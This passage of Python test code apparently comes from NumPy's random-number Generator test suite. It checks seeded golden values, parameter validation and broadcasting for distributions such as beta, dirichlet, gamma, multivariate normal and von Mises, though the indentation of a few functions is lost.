        out = np.zeros(outshape, dtype=a.dtype)
        with pytest.raises(ValueError, match='same shape'):
            random.permuted(a, out=out)

    def test_permuted_out_with_wrong_type(self):
        # An out array with an incompatible dtype raises TypeError.
        out = np.zeros((3, 5), dtype=np.int32)
        x = np.ones((3, 5))
        with pytest.raises(TypeError, match='Cannot cast'):
            random.permuted(x, axis=1, out=out)
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
    # Golden-value regression for array and scalar output; a float n
    # (100.123) is accepted and truncated.
    random = Generator(MT19937(self.seed))
    actual = random.binomial(100.123, .456, size=(3, 2))
    desired = np.array([[42, 41],
                        [42, 48],
                        [44, 50]])
    assert_array_equal(actual, desired)

    # The scalar call from a fresh seed must match the first array draw.
    random = Generator(MT19937(self.seed))
    actual = random.binomial(100.123, .456)
    desired = 42
    assert_array_equal(actual, desired)
def test_chisquare(self):
    # Golden-value regression for chisquare(50) from the fixed seed.
    random = Generator(MT19937(self.seed))
    actual = random.chisquare(50, size=(3, 2))
    desired = np.array([[32.9850547060149, 39.0219480493301],
                        [56.2006134779419, 57.3474165711485],
                        [55.4243733880198, 55.4209797925213]])
    assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
    # Golden-value regression for dirichlet with a sized output, plus
    # validation of a negative alpha and the scalar (no size) call.
    random = Generator(MT19937(self.seed))
    alpha = np.array([51.72840233779265162, 39.74494232180943953])
    actual = random.dirichlet(alpha, size=(3, 2))
    desired = np.array([[[0.5439892869558927, 0.45601071304410745],
                         [0.5588917345860708, 0.4411082654139292 ]],
                        [[0.5632074165063435, 0.43679258349365657],
                         [0.54862581112627, 0.45137418887373015]],
                        [[0.49961831357047226, 0.5003816864295278 ],
                         [0.52374806183482, 0.47625193816517997]]])
    assert_array_almost_equal(actual, desired, decimal=15)
    # Any negative alpha entry is invalid.
    bad_alpha = np.array([5.4e-01, -1.0e-16])
    assert_raises(ValueError, random.dirichlet, bad_alpha)

    # Without `size`, a fresh seed must reproduce the first draw above.
    random = Generator(MT19937(self.seed))
    alpha = np.array([51.72840233779265162, 39.74494232180943953])
    actual = random.dirichlet(alpha)
    assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
    # gh-3173: `size` may be a NumPy integer, a list, a tuple, or an
    # integer array -- but a float must raise TypeError.
    p = np.array([51.72840233779265162, 39.74494232180943953])
    cases = [(np.uint32(1), (1, 2)),
             (np.uint32(1), (1, 2)),
             (np.uint32(1), (1, 2)),
             ([2, 2], (2, 2, 2)),
             ((2, 2), (2, 2, 2)),
             (np.array((2, 2)), (2, 2, 2))]
    for size, expected_shape in cases:
        assert_equal(random.dirichlet(p, size).shape, expected_shape)
    assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
    # gh-2089: negative alpha entries are invalid.
    alpha = np.array([5.4e-01, -1.0e-16])
    assert_raises(ValueError, random.dirichlet, alpha)

    # gh-15876: alpha must be one-dimensional.
    for non_1d_alpha in ([[5, 1]],
                         [[5], [1]],
                         [[[5], [1]], [[1], [5]]],
                         np.array([[5, 1], [1, 5]])):
        assert_raises(ValueError, random.dirichlet, non_1d_alpha)
def test_dirichlet_alpha_non_contiguous(self):
    # A non-contiguous alpha (strided slice) must produce the same draws
    # as its contiguous copy from the same seed.
    a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
    alpha = a[::2]  # strided view skipping the invalid middle entry
    random = Generator(MT19937(self.seed))
    non_contig = random.dirichlet(alpha, size=(3, 2))
    random = Generator(MT19937(self.seed))
    contig = random.dirichlet(np.ascontiguousarray(alpha),
                              size=(3, 2))
    assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
    # With extremely small alpha the distribution degenerates to a
    # one-hot vector; the mass must land on the larger alpha component.
    eps = 1.0e-9  # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
    alpha = eps * np.array([1., 1.0e-3])
    random = Generator(MT19937(self.seed))
    actual = random.dirichlet(alpha, size=(3, 2))
    expected = np.array([
        [[1., 0.],
         [1., 0.]],
        [[1., 0.],
         [1., 0.]],
        [[1., 0.],
         [1., 0.]]
    ])
    assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
    # Use alpha.max() < 0.1 to trigger stick breaking code path
    # Statistical check: the sample mean over many draws must approach
    # the exact mean alpha / alpha.sum().
    alpha = np.array([0.02, 0.04, 0.03])
    exact_mean = alpha / alpha.sum()
    random = Generator(MT19937(self.seed))
    sample = random.dirichlet(alpha, size=20000000)
    sample_mean = sample.mean(axis=0)
    assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
    # Golden-value regression for exponential(scale=1.1234).
    random = Generator(MT19937(self.seed))
    actual = random.exponential(1.1234, size=(3, 2))
    desired = np.array([[0.098845481066258, 1.560752510746964],
                        [0.075730916041636, 1.769098974710777],
                        [1.488602544592235, 2.49684815275751 ]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
    # scale=0 degenerates to the constant 0; negative zero is rejected.
    assert_equal(random.exponential(scale=0), 0)
    assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
    # Golden-value regression for the F distribution F(12, 77).
    random = Generator(MT19937(self.seed))
    actual = random.f(12, 77, size=(3, 2))
    desired = np.array([[0.461720027077085, 1.100441958872451],
                        [1.100337455217484, 0.91421736740018 ],
                        [0.500811891303113, 0.826802454552058]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
    # Golden-value regression for gamma(shape=5, scale=3).
    random = Generator(MT19937(self.seed))
    actual = random.gamma(5, 3, size=(3, 2))
    desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
                        [18.73983605132985, 19.57961681699238],
                        [18.17897755150825, 18.17653912505234]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
    # shape=0, scale=0 degenerates to 0; negative zeros are rejected.
    assert_equal(random.gamma(shape=0, scale=0), 0)
    assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
    # Golden-value regression for geometric(p=.123456789).
    random = Generator(MT19937(self.seed))
    actual = random.geometric(.123456789, size=(3, 2))
    desired = np.array([[ 1, 10],
                        [ 1, 12],
                        [ 9, 10]])
    assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
    # p outside (0, 1] must be rejected, whether scalar or array; NaN p
    # must also be rejected (invalid-FP warnings suppressed).
    for bad_p in (1.1, [1.1] * 10, -0.1, [-0.1] * 10):
        assert_raises(ValueError, random.geometric, bad_p)
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.geometric, np.nan)
        assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
    # Golden-value regression for gumbel(loc=.123456789, scale=2.0).
    random = Generator(MT19937(self.seed))
    actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[ 4.688397515056245, -0.289514845417841],
                        [ 4.981176042584683, -0.633224272589149],
                        [-0.055915275687488, -0.333962478257953]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
    # scale=0 degenerates to loc (default 0); negative zero is rejected.
    assert_equal(random.gumbel(scale=0), 0)
    assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
    # Golden-value regression, plus the degenerate nbad=0 / ngood=0
    # cases, where the draw is fully determined.
    random = Generator(MT19937(self.seed))
    actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
    desired = np.array([[ 9, 9],
                        [ 9, 9],
                        [10, 9]])
    assert_array_equal(actual, desired)

    # Test nbad = 0: every draw is all-good, so the sample equals nsample.
    actual = random.hypergeometric(5, 0, 3, size=4)
    desired = np.array([3, 3, 3, 3])
    assert_array_equal(actual, desired)

    actual = random.hypergeometric(15, 0, 12, size=4)
    desired = np.array([12, 12, 12, 12])
    assert_array_equal(actual, desired)

    # Test ngood = 0: no good items exist, so every draw is 0.
    actual = random.hypergeometric(0, 5, 3, size=4)
    desired = np.array([0, 0, 0, 0])
    assert_array_equal(actual, desired)

    actual = random.hypergeometric(0, 15, 12, size=4)
    desired = np.array([0, 0, 0, 0])
    assert_array_equal(actual, desired)
def test_laplace(self):
    # Golden-value regression for laplace(loc=.123456789, scale=2.0).
    random = Generator(MT19937(self.seed))
    actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-3.156353949272393, 1.195863024830054],
                        [-3.435458081645966, 1.656882398925444],
                        [ 0.924824032467446, 1.251116432209336]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
    # scale=0 degenerates to loc (default 0); negative zero is rejected.
    assert_equal(random.laplace(scale=0), 0)
    assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
    # Golden-value regression for logistic(loc=.123456789, scale=2.0).
    random = Generator(MT19937(self.seed))
    actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-4.338584631510999, 1.890171436749954],
                        [-4.64547787337966 , 2.514545562919217],
                        [ 1.495389489198666, 1.967827627577474]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
    # Golden-value regression for lognormal(mean=.123456789, sigma=2.0).
    random = Generator(MT19937(self.seed))
    actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
    desired = np.array([[ 0.0268252166335, 13.9534486483053],
                        [ 0.1204014788936, 2.2422077497792],
                        [ 4.2484199496128, 12.0093343977523]])
    assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
    # sigma=0 degenerates to exp(mean) = exp(0) = 1; -0. is rejected.
    assert_equal(random.lognormal(sigma=0), 1)
    assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
    # Golden-value regression for logseries(p=.923456789).
    random = Generator(MT19937(self.seed))
    actual = random.logseries(p=.923456789, size=(3, 2))
    desired = np.array([[14, 17],
                        [3, 18],
                        [5, 1]])
    assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
    # NaN p must be rejected, scalar or array (FP warnings suppressed).
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.logseries, np.nan)
        assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
    # Golden-value regression for multinomial with six equal categories.
    random = Generator(MT19937(self.seed))
    actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
    desired = np.array([[[1, 5, 1, 6, 4, 3],
                         [4, 2, 6, 2, 4, 2]],
                        [[5, 3, 2, 6, 3, 1],
                         [4, 4, 0, 2, 3, 7]],
                        [[6, 3, 1, 5, 3, 2],
                         [5, 5, 3, 1, 2, 4]]])
    assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
    # Golden-value regression for each decomposition method, followed by
    # validation of the check_valid / covariance error handling.
    random = Generator(MT19937(self.seed))
    mean = (.123456789, 10)
    cov = [[1, 0], [0, 1]]
    size = (3, 2)
    actual = random.multivariate_normal(mean, cov, size, method=method)
    desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
                         [-0.9967333370066214, 10.342002097029821 ]],
                        [[ 0.7850019631242964, 11.181113712443013 ],
                         [ 0.8901349653255224, 8.873825399642492 ]],
                        [[ 0.7130260107430003, 9.551628690083056 ],
                         [ 0.7127098726541128, 11.991709234143173 ]]])
    assert_array_almost_equal(actual, desired, decimal=15)

    # Check for default size, was raising deprecation warning
    actual = random.multivariate_normal(mean, cov, method=method)
    desired = np.array([0.233278563284287, 9.424140804347195])
    assert_array_almost_equal(actual, desired, decimal=15)
    # Check that non symmetric covariance input raises exception when
    # check_valid='raises' if using default svd method.
    mean = [0, 0]
    cov = [[1, 2], [1, 2]]
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise')

    # Check that non positive-semidefinite covariance warns with
    # RuntimeWarning
    cov = [[1, 2], [2, 1]]
    assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
    assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
                 method='eigh')
    # cholesky cannot factor an indefinite matrix at all.
    assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                  method='cholesky')

    # and that it doesn't warn with RuntimeWarning check_valid='ignore'
    assert_no_warnings(random.multivariate_normal, mean, cov,
                       check_valid='ignore')

    # and that it raises with RuntimeWarning check_valid='raises'
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise')
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='raise', method='eigh')

    # check degenerate samples from singular covariance matrix
    cov = [[1, 1], [1, 1]]
    if method in ('svd', 'eigh'):
        samples = random.multivariate_normal(mean, cov, size=(3, 2),
                                             method=method)
        # Singular cov forces both components onto the same line.
        assert_array_almost_equal(samples[..., 0], samples[..., 1],
                                  decimal=6)
    else:
        assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
                      method='cholesky')

    # A float32 covariance must not trigger spurious warnings.
    # NOTE(review): sup.record() is called *after* the sampling call, so a
    # warning raised by that call would not be captured -- confirm intent.
    cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
    with suppress_warnings() as sup:
        random.multivariate_normal(mean, cov, method=method)
        w = sup.record(RuntimeWarning)
        assert len(w) == 0

    # Invalid check_valid values and mis-shaped mean/cov must raise.
    mu = np.zeros(2)
    cov = np.eye(2)
    assert_raises(ValueError, random.multivariate_normal, mean, cov,
                  check_valid='other')
    assert_raises(ValueError, random.multivariate_normal,
                  np.zeros((2, 1, 1)), cov)
    assert_raises(ValueError, random.multivariate_normal,
                  mu, np.empty((3, 2)))
    assert_raises(ValueError, random.multivariate_normal,
                  mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
    # Statistical sanity check: empirical mean and covariance of a large
    # sample must be close to the requested parameters.
    random = Generator(MT19937(self.seed))
    n_s = 1000
    mean = np.array([1, 2])
    cov = np.array([[2, 1], [1, 2]])
    s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
    s_center = s - mean
    cov_emp = (s_center.T @ s_center) / (n_s - 1)
    # these are pretty loose and are only designed to detect major errors
    assert np.all(np.abs(s_center.mean(-2)) < 0.1)
    assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
    # Golden-value regression for negative_binomial(n=100, p=.12345).
    random = Generator(MT19937(self.seed))
    actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
    desired = np.array([[543, 727],
                        [775, 760],
                        [600, 674]])
    assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
    # NaN p must be rejected, scalar or array (FP warnings suppressed).
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.negative_binomial, 100, np.nan)
        assert_raises(ValueError, random.negative_binomial, 100,
                      [np.nan] * 10)
def test_negative_binomial_p0_exception(self):
    # Verify that p=0 raises an exception.
    # (The unused `x = ...` binding was removed; only the raise matters.)
    with assert_raises(ValueError):
        random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
    # Golden-value regression for three parameter regimes, including
    # df < 1 and the nonc=0 (central) special case.
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
    desired = np.array([[ 1.70561552362133, 15.97378184942111],
                        [13.71483425173724, 20.17859633310629],
                        [11.3615477156643 , 3.67891108738029]])
    assert_array_almost_equal(actual, desired, decimal=14)

    # df < 1 exercises a different sampling path; stream continues.
    actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
    desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
                        [1.14554372041263e+00, 1.38187755933435e-03],
                        [1.90659181905387e+00, 1.21772577941822e+00]])
    assert_array_almost_equal(actual, desired, decimal=14)

    # nonc=0 must behave like the central chi-square from a fresh seed.
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
    desired = np.array([[0.82947954590419, 1.80139670767078],
                        [6.58720057417794, 7.00491463609814],
                        [6.31101879073157, 6.30982307753005]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
    # Golden-value regression for noncentral_f(5, 2, nonc=1).
    random = Generator(MT19937(self.seed))
    actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
                                 size=(3, 2))
    desired = np.array([[0.060310671139 , 0.23866058175939],
                        [0.86860246709073, 0.2668510459738 ],
                        [0.23375780078364, 1.88922102885943]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
    # A NaN non-centrality parameter must propagate to the sample.
    rng = Generator(MT19937(self.seed))
    sample = rng.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
    assert np.isnan(sample)
def test_normal(self):
    # Golden-value regression for normal(loc=.123456789, scale=2.0).
    random = Generator(MT19937(self.seed))
    actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
    desired = np.array([[-3.618412914693162, 2.635726692647081],
                        [-2.116923463013243, 0.807460983059643],
                        [ 1.446547137248593, 2.485684213886024]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
    # scale=0 degenerates to loc (default 0); negative zero is rejected.
    assert_equal(random.normal(scale=0), 0)
    assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
    # Golden-value regression for pareto(a=.123456789); compared in
    # nulps because of a platform-specific rounding quirk (see below).
    random = Generator(MT19937(self.seed))
    actual = random.pareto(a=.123456789, size=(3, 2))
    desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
                        [7.2640150889064703e-01, 3.4650454783825594e+05],
                        [4.5852344481994740e+04, 6.5851383009539105e+07]])
    # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
    # matrix differs by 24 nulps. Discussion:
    # https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
    # Consensus is that this is probably some gcc quirk that affects
    # rounding but not in any important way, so we just use a looser
    # tolerance on this test:
    np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
    # Golden-value regression: with tiny lam all draws are 0.
    random = Generator(MT19937(self.seed))
    actual = random.poisson(lam=.123456789, size=(3, 2))
    desired = np.array([[0, 0],
                        [0, 0],
                        [0, 0]])
    assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
    # lam must be non-negative and small enough not to overflow int64;
    # NaN lam is rejected too (FP warnings suppressed).
    lam_big = np.iinfo('int64').max
    lam_neg = -1
    for bad_lam in (lam_neg, [lam_neg] * 10, lam_big, [lam_big] * 10):
        assert_raises(ValueError, random.poisson, bad_lam)
    with np.errstate(invalid='ignore'):
        assert_raises(ValueError, random.poisson, np.nan)
        assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
    # Golden-value regression for power(a=.123456789).
    random = Generator(MT19937(self.seed))
    actual = random.power(a=.123456789, size=(3, 2))
    desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
                        [2.482442984543471e-10, 1.527108843266079e-01],
                        [8.188283434244285e-02, 3.950547209346948e-01]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
    # Golden-value regression for rayleigh(scale=10).
    random = Generator(MT19937(self.seed))
    actual = random.rayleigh(scale=10, size=(3, 2))
    desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
                        [ 4.19850651287094, 17.08718809823704],
                        [14.7907457708776 , 15.85545333419775]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
    # scale=0 degenerates to the constant 0; negative zero is rejected.
    assert_equal(random.rayleigh(scale=0), 0)
    assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
    # Golden-value regression for the standard Cauchy distribution.
    random = Generator(MT19937(self.seed))
    actual = random.standard_cauchy(size=(3, 2))
    desired = np.array([[-1.489437778266206, -3.275389641569784],
                        [ 0.560102864910406, -0.680780916282552],
                        [-1.314912905226277, 0.295852965660225]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
    # Golden-value regression for the inverse-CDF sampling method.
    random = Generator(MT19937(self.seed))
    actual = random.standard_exponential(size=(3, 2), method='inv')
    desired = np.array([[0.102031839440643, 1.229350298474972],
                        [0.088137284693098, 1.459859985522667],
                        [1.093830802293668, 1.256977002164613]])
    assert_array_almost_equal(actual, desired, decimal=15)
# NOTE(review): "expoential" is a typo in the test name; renaming would
# change the reported test id, so it is left untouched here.
def test_standard_expoential_type_error(self):
    # Only floating-point dtypes are supported.
    assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
    # Golden-value regression for standard_gamma(shape=3).
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(shape=3, size=(3, 2))
    desired = np.array([[0.62970724056362, 1.22379851271008],
                        [3.899412530884 , 4.12479964250139],
                        [3.74994102464584, 3.74929307690815]])
    assert_array_almost_equal(actual, desired, decimal=14)
# NOTE(review): "gammma" is a typo in the test name; renaming would
# change the reported test id, so it is left untouched here.
def test_standard_gammma_scalar_float(self):
    # A scalar float32 draw from the fixed seed has a recorded value.
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(3, dtype=np.float32)
    desired = 2.9242148399353027
    assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
    # Same draw as test_standard_gamma, checked at reduced precision.
    random = Generator(MT19937(self.seed))
    actual = random.standard_gamma(shape=3, size=(3, 2))
    desired = np.array([[0.62971, 1.2238 ],
                        [3.89941, 4.1248 ],
                        [3.74994, 3.74929]])
    assert_array_almost_equal(actual, desired, decimal=5)
# NOTE(review): "gammma" is a typo in the test name; renaming would
# change the reported test id, so it is left untouched here.
def test_standard_gammma_float_out(self):
    # Filling a pre-allocated float32 `out` array must reproduce the
    # recorded values, with or without an explicit matching `size`.
    actual = np.zeros((3, 2), dtype=np.float32)
    random = Generator(MT19937(self.seed))
    random.standard_gamma(10.0, out=actual, dtype=np.float32)
    desired = np.array([[10.14987, 7.87012],
                        [ 9.46284, 12.56832],
                        [13.82495, 7.81533]], dtype=np.float32)
    assert_array_almost_equal(actual, desired, decimal=5)

    random = Generator(MT19937(self.seed))
    random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
    assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
    # Only floating-point dtypes are supported.
    assert_raises(TypeError, random.standard_gamma, 1.,
                  dtype='int32')
def test_out_size_mismatch(self):
    # An explicit `size` that disagrees with out.shape must be rejected,
    # whether the mismatch is in the element count or in the rank.
    out = np.zeros(10)
    for bad_size in (20, (10, 1)):
        assert_raises(ValueError, random.standard_gamma, 10.0,
                      size=bad_size, out=out)
def test_standard_gamma_0(self):
    # shape=0 degenerates to the constant 0; negative zero is rejected.
    assert_equal(random.standard_gamma(shape=0), 0)
    assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
    # Golden-value regression for the standard normal distribution.
    random = Generator(MT19937(self.seed))
    actual = random.standard_normal(size=(3, 2))
    desired = np.array([[-1.870934851846581, 1.25613495182354 ],
                        [-1.120190126006621, 0.342002097029821],
                        [ 0.661545174124296, 1.181113712443012]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
    # Only floating-point dtypes are supported.
    assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
    # Golden-value regression for Student's t with df=10.
    random = Generator(MT19937(self.seed))
    actual = random.standard_t(df=10, size=(3, 2))
    desired = np.array([[-1.484666193042647, 0.30597891831161 ],
                        [ 1.056684299648085, -0.407312602088507],
                        [ 0.130704414281157, -2.038053410490321]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
    # Golden-value regression for triangular(5.12, 10.23, 20.34).
    random = Generator(MT19937(self.seed))
    actual = random.triangular(left=5.12, mode=10.23, right=20.34,
                               size=(3, 2))
    desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
                        [ 7.68152445215983, 14.36169131136546],
                        [13.16105603911429, 13.72341621856971]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
    # Golden-value regression for uniform(low=1.23, high=10.54).
    random = Generator(MT19937(self.seed))
    actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
    desired = np.array([[2.13306255040998 , 7.816987531021207],
                        [2.015436610109887, 8.377577533009589],
                        [7.421792588856135, 7.891185744455209]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
    # Ranges whose width overflows a double must raise OverflowError,
    # for scalar and array arguments alike; a range that just fits
    # must sample without error.
    fmin = np.finfo('float').min
    fmax = np.finfo('float').max
    func = random.uniform
    for low, high in ((-np.inf, 0), (0, np.inf), (fmin, fmax),
                      ([-np.inf], [0]), ([0], [np.inf])):
        assert_raises(OverflowError, func, low, high)
    # (fmax / 1e17) - fmin is within range, so this should not throw
    # account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
    # DBL_MAX by increasing fmin a bit
    random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
    # Regression test for gh: 8865 -- an exception raised while coercing
    # an argument to a scalar must propagate out of the distribution
    # call instead of being swallowed.
    class ThrowingFloat(np.ndarray):
        def __float__(self):
            raise TypeError

    class ThrowingInteger(np.ndarray):
        def __int__(self):
            raise TypeError

    bad_float = np.array(1.0).view(ThrowingFloat)
    assert_raises(TypeError, random.uniform, bad_float, bad_float)

    bad_int = np.array(1).view(ThrowingInteger)
    assert_raises(TypeError, random.hypergeometric, bad_int, 1, 1)
def test_vonmises(self):
    # Golden-value regression for vonmises(mu=1.23, kappa=1.54).
    random = Generator(MT19937(self.seed))
    actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
    desired = np.array([[ 1.107972248690106, 2.841536476232361],
                        [ 1.832602376042457, 1.945511926976032],
                        [-0.260147475776542, 2.058047492231698]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
    # check infinite loop, gh-4720: a tiny kappa must still terminate
    # and produce finite samples.
    random = Generator(MT19937(self.seed))
    r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
    assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
    # A NaN kappa must propagate to the sample.
    random = Generator(MT19937(self.seed))
    r = random.vonmises(mu=0., kappa=np.nan)
    assert_(np.isnan(r))
def test_wald(self):
    # Golden-value regression for wald(mean=1.23, scale=1.54).
    random = Generator(MT19937(self.seed))
    actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
    desired = np.array([[0.26871721804551, 3.2233942732115 ],
                        [2.20328374987066, 2.40958405189353],
                        [2.07093587449261, 0.73073890064369]])
    assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
    # Golden-value regression for weibull(a=1.23).
    random = Generator(MT19937(self.seed))
    actual = random.weibull(a=1.23, size=(3, 2))
    desired = np.array([[0.138613914769468, 1.306463419753191],
                        [0.111623365934763, 1.446570494646721],
                        [1.257145775276011, 1.914247725027957]])
    assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
    # a=0 degenerates to all zeros; negative zero is rejected.
    random = Generator(MT19937(self.seed))
    assert_equal(random.weibull(a=0, size=12), np.zeros(12))
    assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
    # Golden-value regression for zipf(a=1.23).
    random = Generator(MT19937(self.seed))
    actual = random.zipf(a=1.23, size=(3, 2))
    desired = np.array([[ 1, 1],
                        [ 10, 867],
                        [354, 2]])
    assert_array_equal(actual, desired)
class TestBroadcast:
    # tests that functions that broadcast behave
    # correctly when presented with non-scalar arguments
    def setup(self):
        self.seed = 123456789

    # pytest no longer calls the nose-style `setup` hook (removed in
    # pytest 8); expose the same initializer under the modern name so the
    # tests are seeded under either collection style.
    setup_method = setup
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
    # Broadcasting loc (then scale) to length 3 must reproduce the same
    # recorded values; a negative scale must raise in either layout.
    loc = [0]
    scale = [1]
    bad_scale = [-1]
    random = Generator(MT19937(self.seed))
    desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])

    random = Generator(MT19937(self.seed))
    actual = random.normal(loc * 3, scale)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, random.normal, loc * 3, bad_scale)

    random = Generator(MT19937(self.seed))
    normal = random.normal
    actual = normal(loc, scale * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
    # Broadcasting a (then b) to length 3 must reproduce the same
    # recorded values; negative parameters must raise.
    a = [1]
    b = [2]
    bad_a = [-1]
    bad_b = [-2]
    desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])

    random = Generator(MT19937(self.seed))
    beta = random.beta
    actual = beta(a * 3, b)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, beta, bad_a * 3, b)
    assert_raises(ValueError, beta, a * 3, bad_b)

    random = Generator(MT19937(self.seed))
    actual = random.beta(a, b * 3)
